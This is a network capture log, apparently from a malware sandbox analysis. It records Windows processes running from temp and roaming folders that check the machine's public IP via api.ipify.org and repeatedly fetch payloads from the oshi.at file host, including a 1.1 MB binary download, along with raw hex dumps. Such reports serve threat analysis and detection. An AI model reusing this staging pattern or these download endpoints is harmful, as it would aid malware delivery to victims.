                                                                                                        2025-01-13 02:01:00 UTC4096INData Raw: 95 35 a7 51 20 8b d9 1e 3f ff e7 e0 ac 9e d3 4e a2 b8 ce 26 62 9a 07 90 d6 75 c6 14 b6 59 d5 27 e4 54 da e1 e0 2b 4d 6d d2 24 c2 56 c1 82 db d6 8f 77 2a ae 5b e4 15 d4 30 8b cf 13 12 d0 fc 39 15 62 bc 8d 17 ec d2 0f 62 26 fb 96 55 ee 14 b9 86 de 49 da 46 0b 5d 3f ea d6 03 08 d1 47 84 6f e4 2b 5f af eb 2d 05 46 82 96 a2 f8 f9 32 3d d5 05 47 bd bb 64 8a 8a c5 a9 a2 80 fd 2e f6 6c 41 9a a4 22 6f 95 d4 48 90 60 27 8f 36 0e ca bf 4c 40 3f 33 19 48 d3 d8 68 b9 e1 a1 a6 93 e4 2d 70 aa 4a 82 07 ed 24 66 bf 69 4f 9a b4 5e cd a9 0d 7c 44 e4 ad cd 19 d5 b1 f4 58 c4 7a 54 74 78 03 67 56 05 ba 51 b8 9a 21 ec fd 24 8a 0d 40 4e 34 06 aa d1 9b 23 4c d4 7f 4e 37 7d 98 47 66 0f 63 18 c8 f6 a9 0a a0 91 5d bc fa da 71 11 dd c6 6c c3 c6 0f 11 e8 f3 ab 4d e0 3a 0f cc 5e 0f af
                                                                                                        Data Ascii: 5Q ?N&buY'T+Mm$Vw*[09bb&UIF]?Go+_-F2=Gd.lA"oH`'6L@?3Hh-pJ$fiO^|DXzTtxgVQ!$@N4#LN7}Gfc]qlM:^
                                                                                                        2025-01-13 02:01:00 UTC676INData Raw: 5d b2 12 35 05 77 f5 ac 2c 54 6b ab 36 15 c3 9e 3d 57 36 55 aa 2b 6a 9d 8e d2 7a 3d 8f 23 89 38 27 df f5 38 ac 76 bb 84 93 18 ce 02 de 86 51 38 5c ee 63 16 77 cb 80 46 2c 60 c8 df 95 32 8c cc 0e 0b bc 4c c9 cd 9f ab 75 8a 63 f8 f8 6e e8 d0 d2 76 55 47 df 30 66 e7 78 b1 8a 66 cc b0 49 fa d6 c1 ac 2d 35 ca 1a ef 0f 48 66 cc fd 7b e6 c3 e3 50 86 a0 d8 24 e9 43 6a 84 bb e2 d9 d9 af e6 d2 97 b5 5a 6e 97 5b 27 35 d8 8a 8f bc a2 ab 1a 37 c0 c9 af 63 53 84 39 5f 6e 20 66 d5 de d4 c0 93 25 de c6 3c 06 fa e1 0a d9 86 08 ae b3 40 c7 3e 36 b1 38 7b a5 cf 6e 53 33 e3 ef a3 80 3d 72 a8 84 2c 40 46 89 18 c0 ca 14 f6 fc 6c 2f 49 98 67 52 9d f6 bb 87 33 62 cc de f6 56 a9 93 19 42 5f af d4 53 12 a0 fd ff d9 7d 3d 3c 00 d1 6f 84 1c 6f 22 20 99 cf 41 68 ba 3c a1 21 03 d9 d9
                                                                                                        Data Ascii: ]5w,Tk6=W6U+jz=#8'8vQ8\cwF,`2LucnvUG0fxfI-5Hf{P$CjZn['57cS9_n f%<@>68{nS3=r,@Fl/IgR3bVB_S}=<oo" Ah<!
                                                                                                        2025-01-13 02:01:00 UTC4096INData Raw: 54 f6 62 98 1c 59 a2 f0 6c 8f 3c 9f 41 1b ee ca e0 ba 9e 65 e8 4c 24 58 5d 8a 00 f0 09 31 b2 3f d8 35 7a 05 76 fc 7b bd 7d 5d b3 f8 32 62 55 a5 ee c3 94 f2 b9 30 26 c3 5b 52 0d 03 bd 92 b6 91 be 46 de 77 09 a3 56 e2 a8 33 7c 0a 08 09 5f b0 11 14 65 52 32 20 82 d8 4e 9d 45 3b 6d 6d fe bd 64 ff a4 14 de e9 62 c4 6a be ff 75 3d a3 b0 55 bc 21 3a 99 ed 09 7b 73 df 18 a9 ff 22 f2 45 ec 53 78 a8 15 bf 13 d2 a0 2f 85 95 8d 0f 55 03 cc 20 23 bd 7e a9 f7 fe 6d f9 3e c6 be 3b 2e 54 82 7b a9 ce 3a b6 9c 6b 79 a9 c6 f2 ed eb 74 e7 12 6f 57 70 31 83 ef d7 0e 7f 57 25 5d ec 1c 56 24 84 85 be 79 f6 af 83 dc b9 e4 92 c8 66 bf 16 6f 34 cf b4 6a 84 8c a9 a3 4c c5 66 c6 20 48 82 2d e1 fb 3a 28 cb 61 99 76 62 9f 83 d5 fb 42 d3 47 7b 4c f8 31 19 36 1c 50 96 bf d6 39 b5 17 f7
                                                                                                        Data Ascii: TbYl<AeL$X]1?5zv{}]2bU0&[RFwV3|_eR2 NE;mmdbju=U!:{s"ESx/U #~m>;.T{:kytoWp1W%]V$yfo4jLf H-:(avbBG{L16P9


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.449740104.26.12.2054437904C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:25 UTC155OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                        Host: api.ipify.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-13 02:01:26 UTC424INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 13 Jan 2025 02:01:25 GMT
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 12
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 9011cc613d0e41ac-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1609&rtt_var=612&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=1814791&cwnd=252&unsent_bytes=0&cid=4d06c2a6ec61b91a&ts=179&x=0"
                                                                                                        2025-01-13 02:01:26 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                        Data Ascii: 8.46.123.189


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.449739194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:26 UTC186OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-13 02:01:27 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:26 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:27 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.449742194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:28 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:30 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:30 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:30 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.449743194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:31 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:32 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:32 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:32 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.449744194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:33 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:34 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:34 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:34 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.449745194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:35 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:35 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:35 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:35 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.449746194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:37 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:37 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:37 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:37 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.449748194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:38 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:40 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:39 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:40 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.449747194.15.112.2484438128C:\Users\user\AppData\Roaming\ilsucsfth.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:38 UTC186OUTGET /cQXB HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-13 02:01:39 UTC317INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:39 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 1128456
                                                                                                        Connection: close
                                                                                                        ETag: "a0ade6f076fc1461b0227bc5cf8254b4"
                                                                                                        Content-Disposition: attachment; filename=pOzZ.dat
                                                                                                        Last-Modified: Mon, 13 Jan 2025 00:05:26 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2025-01-13 02:01:39 UTC3766INData Raw: eb 86 d0 a7 6d 80 c2 f9 31 1a cc c0 61 58 e3 ef e7 bb dc 2a 53 77 aa 01 4e 53 fc 72 76 c2 eb 13 b9 5f 67 6d 7e bf cf aa 4d f2 95 02 3b b1 b8 13 57 3f 9c 57 a8 f4 ae 44 5b c7 f1 d8 64 8e 0a df b7 31 3b 90 83 88 d8 54 a7 9c d0 35 84 4d ea d6 d1 fe 63 f1 01 20 7f 8c 8f fe f1 58 e5 ae 5c 23 86 19 5d 0c 9d 32 e0 ca e1 9a 30 bb 9c 3d c5 7c 3f b0 ef 04 63 6f 8b d6 dd 3f 0f ea df e6 84 49 07 ca 2e e4 99 8a 0e 52 37 39 b1 18 d4 57 23 fc 9c b5 04 8f 3d f6 e4 31 3d 5a bb ba 1b b8 57 d9 41 1d 4b fa b6 69 c5 2d 24 4a 49 a8 20 cf 39 84 f5 a2 7e a5 1d 77 5f 19 04 53 76 34 f7 08 e5 72 90 77 93 1b 37 ca 54 c9 51 be eb 9c 00 aa 52 a1 e3 43 1c b3 9b 1e 04 2f df 64 3e 6b 30 ff 80 2d b6 7e b9 21 8f 2e 75 72 47 51 99 44 a8 8c fd 0c e7 be 0c b2 97 0c d3 fe aa d6 a3 24 57 ee fd
                                                                                                        Data Ascii: m1aX*SwNSrv_gm~M;W?WD[d1;T5Mc X\#]20=|?co?I.R79W#=1=ZWAKi-$JI 9~w_Sv4rw7TQRC/d>k0-~!.urGQD$W
                                                                                                        2025-01-13 02:01:39 UTC4096INData Raw: b2 e4 dd 63 21 a9 98 9a d0 d0 9f 07 e3 15 dc b2 d0 c6 71 b3 a2 7f 06 5f 85 17 c8 e2 4f 96 33 e2 10 dd 72 8c 3b 9d 21 3e a4 e8 e2 9f 74 43 66 8d cb 08 2f 66 a3 6f d5 f2 15 e6 d9 0b 62 69 3e c4 3c 8c d0 87 a0 35 55 e8 cc 18 8a d3 5f 9f ea 6f f2 5c 01 40 3e fa f1 80 30 6d d1 99 c3 90 6f 5e e8 23 0a 50 f5 07 9b 9b 4c cd 6c a3 2b f7 a6 30 20 ef 23 8b b5 75 b9 59 6f b3 dd a2 74 46 dd 91 c9 d1 4e 1a 44 5e f9 58 4e f2 0c b3 be 7e 82 41 89 d6 01 38 bb 99 f4 66 cd 07 c6 a9 22 e6 06 62 1d c6 2c 36 96 7f 48 20 3a 1f fb 51 65 c9 b5 82 a6 0c 8c f5 54 5f 4a 0b 1f 6e bf 96 24 ec 82 5c 3d bf 2a df c2 06 bb aa b6 3c d6 36 d6 fa 4f f6 34 1a 9f 23 c9 b4 62 1f 41 db c6 54 ab ac 80 02 2f da 25 3a 90 79 8f 4a 80 e3 96 52 c7 0b 9d db 49 39 97 66 6b c7 ac b0 7b 24 b6 93 c9 06 50
                                                                                                        Data Ascii: c!q_O3r;!>tCf/fobi><5U_o\@>0mo^#PLl+0 #uYotFND^XN~A8f"b,6H :QeT_Jn$\=*<6O4#bAT/%:yJRI9fk{$P
                                                                                                        2025-01-13 02:01:39 UTC4096INData Raw: 84 8a 12 29 98 fb 25 91 27 a2 bb df 9d 33 dd 98 4d 87 22 f4 50 38 94 f9 2e c8 4e d3 05 cb 10 6b da 2e 53 26 8c 93 84 52 30 18 c6 36 a8 64 ca 58 48 37 45 33 e6 c7 78 a5 41 07 0a 85 49 25 58 cf d2 6f eb eb a8 e9 f2 c1 28 84 cb b4 57 58 ea 24 e7 71 22 e9 19 e2 7e 62 af 32 61 3e 4c 29 85 2e f5 17 e6 d8 4e 40 53 8f 38 19 8d e1 4f 7a 6c d4 fe 41 d5 0a a6 af 58 a6 79 cf 9c e4 8b 99 24 2a dc 66 bc f4 2d 3c 17 98 43 bd 92 e3 1e 7a 14 27 9e 99 9c ff 76 06 b7 01 f8 54 88 b7 ec 0c 02 a2 0a 1b e3 a8 a5 c6 9c c2 1b af 40 0e 0a b3 46 92 2a 3e 36 d8 fc fe 32 22 b2 7b 1d 62 9b 73 8d b6 fd bb e9 d9 98 5e 7f 14 8f 85 d0 1b 80 cd 6d 37 38 e1 2c cf f7 7f d7 43 ba c3 8e d3 7c 3f 63 cb dc 08 5d d0 18 e4 dc 60 c1 5b f8 fb 61 40 0b 03 f3 fc 58 33 b5 bf 15 e7 74 00 c8 75 38 47 f6
                                                                                                        Data Ascii: )%'3M"P8.Nk.S&R06dXH7E3xAI%Xo(WX$q"~b2a>L).N@S8OzlAXy$*f-<Cz'vT@F*>62"{bs^m78,C|?c]`[a@X3tu8G
                                                                                                        2025-01-13 02:01:39 UTC4096INData Raw: 92 cc af 54 9b 90 13 6a c7 7f 11 39 ad 13 e3 8f 88 02 c7 ae 4f f8 5b 05 b2 23 14 77 50 f6 88 57 5a a9 6b f6 ca 8c dd 29 32 8f 07 b3 c3 f5 b0 01 77 f6 0b 04 33 36 5f 33 3a df 78 77 aa c5 91 07 c2 bd 25 16 e6 8a 2f 1e e1 c1 16 d2 6c bd eb 2f 8b d7 0b 6a 1b 58 e3 5c 85 68 da 8e 9a 5a 89 ca b0 1d 7f b6 c2 3a 02 18 5b a2 7b 80 59 fd 65 79 1b 47 a7 b4 68 e5 14 42 25 34 ca 30 32 fb df 96 42 e2 66 62 1d 73 be 2f fd 48 d9 c6 aa 73 1c 65 28 f6 cf 41 2c 64 65 a4 8d 46 2b e1 4a ef e6 3d 8a f0 2c e3 5d a7 30 a8 18 da 0d da 39 07 cf f0 c3 2d 45 28 51 01 57 d5 0f 0c aa 25 88 83 db 8d 63 20 da 9d 2b f5 48 89 fc 5c 84 2f 03 4e aa 8e 18 f6 94 a3 0c 65 c6 73 9c 78 ac 59 f1 d9 97 f5 83 16 a8 76 8c 87 a4 28 5b 67 dc ca 94 bb 47 ca 5a c8 3e 7f 18 58 8e 84 1f a1 f0 db c0 90 f8
                                                                                                        Data Ascii: Tj9O[#wPWZk)2w36_3:xw%/l/jX\hZ:[{YeyGhB%402Bfbs/Hse(A,deF+J=,]09-E(QW%c +H\/NesxYv([gGZ>X
